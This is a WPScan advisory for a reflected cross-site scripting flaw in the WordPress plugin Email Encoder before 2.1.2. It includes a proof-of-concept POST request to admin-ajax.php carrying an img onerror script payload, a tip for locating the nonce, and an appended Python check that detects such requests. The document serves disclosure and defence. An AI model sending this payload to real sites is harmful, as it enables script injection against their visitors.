wpvulndb dc11 WPVDB-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558
Aug 02, 2021 - 12:00 a.m.

Email Encoder < 2.1.2 - Reflected Cross Site Scripting

2021-08-02 00:00:00
dc11
wpscan.com

EPSS: 0.001 (Low)
Percentile: 43.3%

The plugin has an endpoint that requires no authentication and renders a user-supplied value in the HTML response without escaping or sanitizing the data.

PoC

The vulnerable function is nonce-protected; the nonce can be found in the site’s HTML source by searching for the JavaScript variable “eeb_ef”.

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=&eebMethod=escape&eebDisplay=<img src=1 onerror=alert(1)>
```
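A detection check for the request shape shown in the PoC, added here as an example and not part of the advisory or the plugin's code: it flags requests to admin-ajax.php with the action eeb_get_email_form_output whose eebDisplay value contains markup. The function name, the regex, the constructed sample requests, and the choice to inspect both the query string and the body are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
AJAX_ACTION = "eeb_get_email_form_output"   # action name taken from the PoC
REFLECTED_PARAM = "eebDisplay"              # parameter rendered in the response

# Markup indicators: an opening tag, an inline event handler, a javascript: URI.
MARKUP_RE = re.compile(r"<\s*[a-z!/]|\bon\w+\s*=|javascript\s*:", re.IGNORECASE)


def inspect_request(raw):
    """Return a finding dict if a raw HTTP request matches the advisory, else None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return None  # no method and target, so not an HTTP request line
    method, target = request_line[0], request_line[1]
    url = urlsplit(target)
    if url.path != AJAX_PATH:
        return None
    # Assumption: check parameters in the query string and, for POST, the body.
    # parse_qs URL-decodes each value once, so %3Cimg and <img compare equal.
    params = parse_qs(url.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body.strip(), keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    if AJAX_ACTION not in params.get("action", []):
        return None
    hits = [v for v in params.get(REFLECTED_PARAM, []) if MARKUP_RE.search(v)]
    if not hits:
        return None
    return {"action": AJAX_ACTION, "param": REFLECTED_PARAM, "values": hits}


# Constructed sample requests (headers trimmed); the first mirrors the PoC body.
_HEAD = ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
_BODY = "action=eeb_get_email_form_output&eebsec=&eebMethod=escape&eebDisplay="
SAMPLE_POC = _HEAD + _BODY + "<img src=1 onerror=alert(1)>"
SAMPLE_BENIGN = _HEAD + _BODY + "Contact+us"

if __name__ == "__main__":
    for name, req in (("poc", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_request(req))
```
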

CPE  Name  Operator  Version
email-encoder-bundle  lt  2.1.2